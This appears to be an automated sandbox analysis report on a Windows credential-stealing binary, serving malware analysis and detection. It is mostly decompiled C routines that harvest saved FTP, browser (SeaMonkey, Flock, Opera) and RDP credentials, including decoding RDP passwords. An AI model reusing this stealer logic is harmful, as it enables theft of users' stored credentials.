GlobalUnlock.KERNEL32(?,00000000,00000000,?,?,00000001,?,?,?), ref: 00410400

Strings

STATUS-IMPORT-OK, xrefs: 00410413

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$AllocFromLocalLockStreamUnlock
String ID: STATUS-IMPORT-OK
API String ID: 1739492642-1591331578
Opcode ID: 4f01bfc7c59005ac498b36271a855d931b587f62d4dac2cc13a390e485490c02
Instruction ID: 6df69de115551a04476df44e1952b46e0c170849277dc35291dc49560c939efb
Opcode Fuzzy Hash: 4f01bfc7c59005ac498b36271a855d931b587f62d4dac2cc13a390e485490c02
Instruction Fuzzy Hash: F2011672D00108BBDF01AFB6DC86ADDBA75AF04348F10C176B514B5161EB7D8AD19B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040234A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040234A(void* __eflags, CHAR* _a4) {
				int _t6;
				char* _t8;
				char* _t10;
				CHAR* _t16;

				_t16 = E00401D15(_a4, 0);
				_t6 = lstrlenA(_a4);
				if(_t6 > 1) {
					_push(_t16);
					if( *_t16 == 0x22) {
						asm("cld");
						_t3 =  &(_t16[1]); // 0x1
						memcpy(_t16, _t3, _t6);
					}
					_pop(_t16);
				}
				_t8 = StrStrIA(_t16, ".exe");
				if(_t8 != 0) {
					 *((char*)(_t8 + 4)) = 0;
				}
				_t10 = StrRChrIA(_t16, 0, 0x5c);
				if(_t10 == 0) {
					 *_t16 = 0;
				} else {
					 *_t10 = 0;
				}
				if(lstrlenA(_t16) <= 3) {
					 *_t16 = 0;
				}
				return _t16;
			}

0x00402359
0x0040235e
0x00402366
0x00402368
0x0040236c
0x0040236e
0x0040236f
0x00402374
0x00402374
0x00402376
0x00402376
0x00402382
0x00402384
0x00402386
0x00402386
0x00402394
0x00402396
0x0040239d
0x00402398
0x00402398
0x00402398
0x004023a9
0x004023ab
0x004023ab
0x004023b3

APIs

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Strings

.exe, xrefs: 00402377

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: .exe
API String ID: 2414487701-4119554291
Opcode ID: 6da275c6b0493195281fe950d056ea7143d898ff5ff1c786a4cb17b6215ba9e9
Instruction ID: 9602a0055837b2c683d31c410c25c7300ba3d5fb0e08763021edc503d6a1462c
Opcode Fuzzy Hash: 6da275c6b0493195281fe950d056ea7143d898ff5ff1c786a4cb17b6215ba9e9
Instruction Fuzzy Hash: 05F0C83220428279DB3126368D06F6F6F859BD2754F28403BF900BB2D2D7FD9881D66D

Uniqueness

Uniqueness Score: -1.00%

Function 00409AD3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409AD3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t17;
				void* _t18;
				void* _t19;

				_t19 = __eflags;
				_t18 = __edx;
				_t17 = __ecx;
				_v8 = E0040150D(_a4, 0x26, 0);
				 *0x415824 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t18, _t19, _a4, _v8);
			}

0x00409ad3
0x00409ad3
0x00409ad3
0x00409ae8
0x00409aeb
0x00409b01
0x00409b1e
0x00409b3a
0x00409b46
0x00409b57

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B01

Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409B46

Strings

Software\Mozilla, xrefs: 00409B10, 00409B2D
\Mozilla\SeaMonkey\, xrefs: 00409B06, 00409B23
SeaMonkey, xrefs: 00409B0B, 00409B28

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
API String ID: 3062143572-164276155
Opcode ID: 4a00222b03334333176dcea683a9445d98e80562337f68bd260ca7bdc00281ef
Instruction ID: 469e708ffeae105ea9a308a9c536805669306337ddb57fa6862c46a73f051f07
Opcode Fuzzy Hash: 4a00222b03334333176dcea683a9445d98e80562337f68bd260ca7bdc00281ef
Instruction Fuzzy Hash: 87F06D7065060CFADF11BF91CC03FCE7B699B84748F508076BA08741E2DAB94AE09A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00409B5A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B5A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t17;
				void* _t18;
				void* _t19;

				_t19 = __eflags;
				_t18 = __edx;
				_t17 = __ecx;
				_v8 = E0040150D(_a4, 0x27, 0);
				 *0x415824 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t18, _t19, _a4, _v8);
			}

0x00409b5a
0x00409b5a
0x00409b5a
0x00409b6f
0x00409b72
0x00409b88
0x00409ba5
0x00409bc1
0x00409bcd
0x00409bde

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B88

Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409BCD

Strings

Software\Mozilla, xrefs: 00409B97, 00409BB4
\Flock\Browser\, xrefs: 00409B8D, 00409BAA
Flock, xrefs: 00409B92, 00409BAF

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Flock$Software\Mozilla$\Flock\Browser\
API String ID: 3062143572-1276807325
Opcode ID: 3b5186146e9358fad67e6a8d322ac6b82a629fabdc15fa544d78e25929924ee3
Instruction ID: 463d24315ff3a1c950cab2458350adb6299bd9700916dbcb37cd850d246ad3b5
Opcode Fuzzy Hash: 3b5186146e9358fad67e6a8d322ac6b82a629fabdc15fa544d78e25929924ee3
Instruction Fuzzy Hash: 8AF09670550608FADB11BF91DC03FCD3B659B88784F108036B608741E2DBF95AD09B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E69F, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040E69F(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				CHAR* _v28;
				unsigned int _v32;
				intOrPtr _v36;
				unsigned int _v40;
				void* _v44;
				char _v48;
				void* _t45;
				char _t48;
				char* _t50;
				char* _t59;
				char _t62;
				char _t65;
				char _t67;
				char* _t68;
				char _t70;
				char _t75;
				char _t83;
				char* _t84;
				char* _t85;
				char* _t86;

				_t45 = E00401E53(_a8);
				if(_t45 != 0) {
					"_OP3_Password2" = 0x50;
					"_MTP_Password2" = 0x53;
					_t48 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t48;
					if(_t48 != 0) {
						_push(_v8);
						_pop( *_t5);
						_v40 = _v40 >> 1;
						_t50 = E0040296C(_v12, _v40);
						__eflags = _t50;
						if(_t50 == 0) {
							_v24 = E004017EC(_v8);
							E00401823(_v12, _v24, _v8);
							_t85 = _v24;
						} else {
							_v24 = _t50;
							_t85 = _t50;
						}
						while(1) {
							_t86 = _t85;
							__eflags = _t86;
							if(_t86 == 0) {
								break;
							}
							__eflags =  *_t86;
							if( *_t86 != 0) {
								_t84 = "<_OP3_Password2";
								while(1) {
									_t59 = StrStrA(_t86, _t84);
									__eflags = _t59;
									if(_t59 != 0) {
										break;
									}
									L10:
									asm("cld");
									asm("repne scasb");
									__eflags =  *_t84;
									if( *_t84 != 0) {
										continue;
									}
									goto L24;
								}
								_t62 = StrStrIA(_t59, 0x416390);
								__eflags = _t62;
								if(_t62 != 0) {
									_t85 = _t62 + 1;
									_v28 = _t85;
									_t65 = StrStrA(_t85, 0x416392);
									__eflags = _t65;
									if(_t65 != 0) {
										 *_t65 = 0;
										_push(_t65);
										_push( *_t65);
										_t67 = lstrlenA(_v28);
										__eflags = _t67;
										if(_t67 != 0) {
											_v32 = _t67;
											_v36 = E0040294B(_v28);
											_t70 = E00402A3B(_v36, _v32);
											__eflags = _t70;
											if(_t70 != 0) {
												_v32 = _v32 >> 1;
												 *_t26 =  *0x416388;
												 *_t27 =  *0x41638c;
												_t75 = E004041BC(_v36,  &_v32,  &_v48);
												__eflags = _t75;
												if(_t75 != 0) {
													E00401486(_a4, 0xbeef0001);
													E004014E8(_a4, _v28);
													E004014BC(_a4, _v36, _v32);
												}
											}
											E004017D5(_v36);
										}
										_pop(_t83);
										_pop(_t68);
										 *_t68 = _t83;
										continue;
									}
								} else {
								}
							}
							break;
						}
						L24:
						E00401486(_a4, 0xbeef0002);
						E004014BC(_a4, _v12, _v8);
						E004017D5(_v24);
						return E00401FB0( &_v20);
					}
					return _t48;
				} else {
					return _t45;
				}
			}

0x0040e6af
0x0040e6b1
0x0040e6b9
0x0040e6c0
0x0040e6d3
0x0040e6d3
0x0040e6d5
0x0040e6db
0x0040e6de
0x0040e6e1
0x0040e6ef
0x0040e6ef
0x0040e6f1
0x0040e702
0x0040e70e
0x0040e713
0x0040e6f3
0x0040e6f3
0x0040e6f6
0x0040e6f6
0x0040e7fb
0x0040e7fb
0x0040e7fb
0x0040e7fd
0x00000000
0x00000000
0x0040e7ff
0x0040e802
0x0040e71b
0x0040e720
0x0040e727
0x0040e727
0x0040e729
0x00000000
0x00000000
0x0040e72d
0x0040e72d
0x0040e735
0x0040e737
0x0040e739
0x00000000
0x00000000
0x00000000
0x0040e73b
0x0040e74d
0x0040e74d
0x0040e74f
0x0040e757
0x0040e759
0x0040e767
0x0040e767
0x0040e769
0x0040e772
0x0040e775
0x0040e776
0x0040e77f
0x0040e77f
0x0040e781
0x0040e783
0x0040e78e
0x0040e797
0x0040e79c
0x0040e79e
0x0040e7a0
0x0040e7a9
0x0040e7b2
0x0040e7c0
0x0040e7c5
0x0040e7c7
0x0040e7d1
0x0040e7dc
0x0040e7ea
0x0040e7ea
0x0040e7c7
0x0040e7f2
0x0040e7f2
0x0040e7f7
0x0040e7f8
0x0040e7f9
0x00000000
0x0040e7f9
0x00000000
0x0040e751
0x0040e74f
0x00000000
0x0040e802
0x0040e808
0x0040e810
0x0040e81e
0x0040e826
0x00000000
0x0040e82f
0x0040e839
0x0040e6b6
0x0040e6b6
0x0040e6b6

Strings

<_OP3_Password2, xrefs: 0040E71B, 0040E720

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: <_OP3_Password2
API String ID: 0-4172175086
Opcode ID: 654973a1006a4803e0c5775a1734a04b48ce5acc9a359d74e5f5969f10b4ccec
Instruction ID: 77b5fce038b4bca379508027ff7cf5d2a33336c3527dc7fb70d514a4f254e7d3
Opcode Fuzzy Hash: 654973a1006a4803e0c5775a1734a04b48ce5acc9a359d74e5f5969f10b4ccec
Instruction Fuzzy Hash: 6D417F72C00109AECF12ABA2CC019EEBEB5EB54354F14847BF414B21B1D73D8E61EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEA2, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040CEA2(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				signed char _v24;
				CHAR* _v28;
				signed char _v32;
				void* _v36;
				char _v40;
				void* _v44;
				char _v48;
				signed char _t40;
				signed char _t43;
				signed char _t51;
				signed char _t53;
				signed char _t55;
				signed char _t59;
				signed char _t64;
				signed char _t65;
				char _t66;

				if( *0x41442d != 0) {
					_t40 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t40;
					if(_t40 != 0) {
						__eflags = _v8 - 0x100000;
						if(_v8 >= 0x100000) {
							L23:
							return E00401FB0( &_v20);
						}
						_t43 = E004022C7(_v12, _v8);
						__eflags = _t43;
						if(_t43 != 0) {
							goto L23;
						}
						_v24 = E0040CDD0("username:s:", _v12, _v8);
						_v28 = E0040CDD0("password 51:b:", _v12, _v8);
						_v32 = E0040CDD0("full address:s:", _v12, _v8);
						__eflags = _v24;
						if(_v24 == 0) {
							L22:
							E004017D5(_v24);
							E004017D5(_v28);
							E004017D5(_v32);
							goto L23;
						}
						__eflags = _v28;
						if(_v28 == 0) {
							goto L22;
						}
						__eflags = _v32;
						if(_v32 != 0) {
							_t51 = lstrlenA(_v28);
							_t64 = _t51 >> 1;
							_push(_t64);
							while(1) {
								_t65 = _t64;
								__eflags = _t65;
								if(_t65 == 0) {
									break;
								}
								asm("lodsw");
								__eflags = _t51 - 0x30;
								if(_t51 < 0x30) {
									L12:
									_t53 = _t51 - 0x41 + 0xa;
									__eflags = _t53;
									L13:
									__eflags = _t53 - 0x30;
									if(_t53 < 0x30) {
										L16:
										_t55 = _t53 - 0x41 + 0xa;
										__eflags = _t55;
										L17:
										_t51 = _t55 << 0x00000004 | _t55 << 0x00000004;
										asm("stosb");
										_t64 = _t65 - 1;
										__eflags = _t64;
										continue;
									}
									__eflags = _t53 - 0x39;
									if(_t53 > 0x39) {
										goto L16;
									}
									_t55 = _t53 - 0x30;
									goto L17;
								}
								__eflags = _t51 - 0x39;
								if(_t51 > 0x39) {
									goto L12;
								}
								_t53 = _t51 - 0x30;
								goto L13;
							}
							_pop(_t66);
							_v40 = _t66;
							_push(_v28);
							_pop( *_t22);
							_v44 = 0;
							_t59 =  *0x41442d( &_v40, 0, 0, 0, 0, 1,  &_v48);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags = _v44;
								if(__eflags != 0) {
									E0040CC8E(__eflags, _a4, _v24, _v32, _v44, _v48);
									LocalFree(_v44);
								}
							}
						}
						goto L22;
					}
					return _t40;
				} else {
					return __eax;
				}
			}

APIs

lstrlenA.KERNEL32(00000000), ref: 0040CF47
LocalFree.KERNEL32(00000000), ref: 0040CFD4

Strings

full address:s:, xrefs: 0040CF19
username:s:, xrefs: 0040CEF3
password 51:b:, xrefs: 0040CF06

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocallstrlen
String ID: full address:s:$password 51:b:$username:s:
API String ID: 3681330831-2945746679
Opcode ID: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
Instruction ID: 60ed0193d19ee7ec15275bf9add7d535b63f43271d864edcc8c9435468f68b04
Opcode Fuzzy Hash: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
Instruction Fuzzy Hash: CB412B7285010AEADF119BE1CD46BEEBB76AB48314F14023BE201711E0D6B94A92DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDD0, Relevance: 7.6, APIs: 5, Instructions: 79
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040CDD0(char* _a4, short* _a8, intOrPtr _a12) {
				unsigned int _v8;
				char* _v12;
				int _v16;
				int _t24;
				char* _t28;
				int _t29;
				CHAR* _t30;
				int _t32;
				CHAR* _t39;
				void* _t40;
				void* _t41;
				int _t42;

				_v12 = 0;
				_v16 = 0;
				_push(_a12);
				_pop( *_t4);
				_v8 = _v8 >> 1;
				_t24 = WideCharToMultiByte(0, 0, _a8, _v8, 0, 0, 0, 0);
				if(_t24 != 0) {
					_v12 = E004017EC(_t24);
					_t42 = _t24;
					if(WideCharToMultiByte(0, 0, _a8, _v8, _v12, _t42, 0, 0) == 0) {
						E004017D5(_v12);
						_v12 = 0;
					}
				}
				if(_v12 == 0) {
					L12:
					E004017D5(_v12);
					return _v16;
				} else {
					_t28 = StrStrIA(_v12, _a4);
					if(_t28 == 0) {
						goto L12;
					}
					_t29 = lstrlenA(_a4);
					_t40 = _t28;
					_t30 = _t29 + _t40;
					_t39 = _t30;
					while( *_t30 != 0) {
						if( *_t30 != 0xd) {
							_t30 =  &(_t30[1]);
							continue;
						}
						 *_t30 = 0;
						_t32 = lstrlenA(_t39);
						if(_t32 != 0) {
							_v16 = E004017EC(_t32);
							_t41 = _t32;
							E00401823(_t39, _v16, _t41);
						}
						goto L12;
					}
					goto L12;
				}
			}

0x0040cdd7
0x0040cdde
0x0040cde5
0x0040cde8
0x0040cdeb
0x0040ce05
0x0040ce07
0x0040ce10
0x0040ce13
0x0040ce2d
0x0040ce32
0x0040ce37
0x0040ce37
0x0040ce2d
0x0040ce42
0x0040ce92
0x0040ce95
0x0040ce9f
0x0040ce44
0x0040ce4f
0x0040ce51
0x00000000
0x00000000
0x0040ce57
0x0040ce5c
0x0040ce5d
0x0040ce5f
0x0040ce8d
0x0040ce66
0x0040ce8c
0x00000000
0x0040ce8c
0x0040ce68
0x0040ce71
0x0040ce73
0x0040ce7c
0x0040ce7f
0x0040ce85
0x0040ce85
0x00000000
0x0040ce8a
0x00000000
0x0040ce8d

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE00
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CE26
StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE4A
lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE6C

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE57

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharLocalMultiWidelstrlen$AllocFree
String ID:
API String ID: 1890766102-0
Opcode ID: 6d8815957a45e9dfaf6c767d0e2a68735c9a9fd13d1a6cd547d648ce541a1017
Instruction ID: 6b6f5cbbcb276d5830e96960ee9e9a70e92c04bd6c7ad57fcd0bd2d929c8f237
Opcode Fuzzy Hash: 6d8815957a45e9dfaf6c767d0e2a68735c9a9fd13d1a6cd547d648ce541a1017
Instruction Fuzzy Hash: B8219276900208FEEF125FE1CC42F9E7BB9EB14314F20416AB114BA1E1D7BD5A80DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004059DE, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004059DE(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t9;
				char* _t11;
				void* _t22;
				char* _t23;
				char* _t24;

				_t22 = __edx;
				_v8 = E0040150D(_a4, 7, 0);
				_t24 =  *0x414082; // 0x0
				_t23 =  *0x414086; // 0x0
				if( *_t23 != 0) {
					do {
						_t9 = StrStrIA(_t23, "FTP Navigator");
						_t26 = _t9;
						if(_t9 != 0) {
							E00404131(_a4, E0040234A(_t26, _t24), "ftplist.txt", 0xbeef0000);
							E004017D5(_t17);
						}
						_t11 = StrStrIA(_t23, "FTP Commander");
						_t27 = _t11;
						if(_t11 != 0) {
							E00404131(_a4, E0040234A(_t27, _t24), "ftplist.txt", 0xbeef0000);
							E004017D5(_t14);
						}
						while( *_t24 != 0) {
							_t24 = _t24 + 1;
							__eflags = _t24;
						}
						_t24 = _t24 + 1;
						asm("cld");
						asm("repne scasb");
						_t29 =  *_t23;
					} while ( *_t23 != 0);
				}
				return E00401553(_t22, _t29, _a4, _v8);
			}

0x004059de
0x004059f2
0x004059f5
0x004059fb
0x00405a04
0x00405a06
0x00405a0c
0x00405a11
0x00405a13
0x00405a2a
0x00405a2f
0x00405a2f
0x00405a3a
0x00405a3f
0x00405a41
0x00405a58
0x00405a5d
0x00405a5d
0x00405a65
0x00405a64
0x00405a64
0x00405a64
0x00405a6a
0x00405a6b
0x00405a73
0x00405a75
0x00405a75
0x00405a06
0x00405a87

APIs

StrStrIA.SHLWAPI(00000000,FTP Navigator), ref: 00405A0C
StrStrIA.SHLWAPI(00000000,FTP Commander,00000000,FTP Navigator), ref: 00405A3A

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

ftplist.txt, xrefs: 00405A21, 00405A4F
FTP Navigator, xrefs: 00405A06
FTP Commander, xrefs: 00405A34

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: FTP Commander$FTP Navigator$ftplist.txt
API String ID: 1884169789-2424314702
Opcode ID: 071ed715c1575a53d15bd0aefe27d8b6db41900db9b29af0497b29d0d5fd1d10
Instruction ID: 47b874bb8b3e3dfff6b261f529f786fdb312fb9a703bd988841c28134be43e48
Opcode Fuzzy Hash: 071ed715c1575a53d15bd0aefe27d8b6db41900db9b29af0497b29d0d5fd1d10
Instruction Fuzzy Hash: 2C0126706405057ADF117B728C02FAF3E29DF90324F24013BB855B51E2EB7C5E828AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040D055, Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040D055(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t8;
				void* _t19;
				char* _t20;

				_t19 = __edx;
				_v8 = E0040150D(_a4, 0x46, 0);
				_t20 =  *0x414082; // 0x0
				if( *_t20 == 0) {
					L7:
					return E00401553(_t19, _t24, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t8 = StrStrIA(_t20, "FTPNow");
					_t22 = _t8;
					if(_t8 == 0) {
						__eflags = StrStrIA(_t20, "FTP Now");
						if(__eflags == 0) {
							goto L6;
						}
						L4:
						_t14 = E0040234A(_t22, _t20);
						if(E0040234A(_t22, _t20) != 0) {
							E00404131(_a4, _t14, "sites.xml", 0xbeef0000);
							E004017D5(_t14);
						}
						goto L6;
					}
					goto L4;
					L6:
					asm("cld");
					asm("repne scasb");
					_t24 =  *_t20;
				} while ( *_t20 != 0);
				goto L7;
			}

0x0040d055
0x0040d068
0x0040d06b
0x0040d074
0x0040d0c7
0x0040d0d4
0x00000000
0x00000000
0x00000000
0x0040d076
0x0040d076
0x0040d07c
0x0040d081
0x0040d083
0x0040d092
0x0040d094
0x00000000
0x00000000
0x0040d096
0x0040d09c
0x0040d09e
0x0040d0af
0x0040d0b4
0x0040d0b4
0x00000000
0x0040d09e
0x00000000
0x0040d0b9
0x0040d0b9
0x0040d0c1
0x0040d0c3
0x0040d0c3
0x00000000

APIs

StrStrIA.SHLWAPI(00000000,FTPNow), ref: 0040D07C
StrStrIA.SHLWAPI(00000000,FTP Now,00000000,FTPNow), ref: 0040D08D

Strings

FTPNow, xrefs: 0040D076
sites.xml, xrefs: 0040D0A6
FTP Now, xrefs: 0040D087

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: FTP Now$FTPNow$sites.xml
API String ID: 0-284577462
Opcode ID: 0860df4516fb36a40e406cc847c61d919e130169d8f6226aaa304c7ed75c8c5c
Instruction ID: 498bbafb3df18556925cf8714bf549501193d9edb70c728f32a1b086909ed1ed
Opcode Fuzzy Hash: 0860df4516fb36a40e406cc847c61d919e130169d8f6226aaa304c7ed75c8c5c
Instruction Fuzzy Hash: 58F0F971D04601B9DB312BB18C02FAF3E654BC1768F24013BB61DB51E2DB7C9E82965D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5EC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040C5EC(void* __eax, intOrPtr _a4, char* _a8) {
				short* _v8;
				int _v12;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _t37;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t47;

				if( *0x4143e1 != 0) {
					_v12 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
					_v8 = E004017EC(_v12);
					MultiByteToWideChar(0, 0, _a8, 0xffffffff, _v8, _v12);
					_t37 =  *0x4143e1(_v8, 0, 0x12, 0, 0,  &_v16);
					__eflags = _t37;
					if(_t37 >= 0) {
						_t52 =  *_v16;
						_t40 =  *((intOrPtr*)( *_v16 + 0x10))(_v16, L"Settings", 0, 0x12, 0,  &_v20);
						__eflags = _t40;
						if(_t40 >= 0) {
							_t42 = E0040106A(_t40, _t52, _v20);
							_v28 = _t42;
							_t43 = _t42;
							__eflags = _t42;
							if(_t42 != 0) {
								_v24 = E004017EC(_v28);
								_t47 = E0040110B(E00401273(_t45, _t52, _v20), _t52, __eflags, _v20, _v24, _v28);
								__eflags = _t47;
								if(_t47 != 0) {
									E00401486(_a4, 0xbeef0000);
									E004014BC(_a4, _v24, _v28);
								}
								_t43 = E004017D5(_v24);
							}
							E00401019(_t43, _t52, _v20);
						}
						 *((intOrPtr*)( *_v16 + 8))(_v16);
					}
					return E004017D5(_v8);
				} else {
					return __eax;
				}
			}

0x0040c5f9
0x0040c611
0x0040c61c
0x0040c62e
0x0040c642
0x0040c648
0x0040c64a
0x0040c653
0x0040c667
0x0040c66a
0x0040c66c
0x0040c671
0x0040c676
0x0040c679
0x0040c679
0x0040c67b
0x0040c685
0x0040c699
0x0040c69e
0x0040c6a0
0x0040c6aa
0x0040c6b8
0x0040c6b8
0x0040c6c0
0x0040c6c0
0x0040c6c8
0x0040c6c8
0x0040c6d5
0x0040c6d5
0x0040c6e1
0x0040c5fc
0x0040c5fc
0x0040c5fc

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C60C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C62E
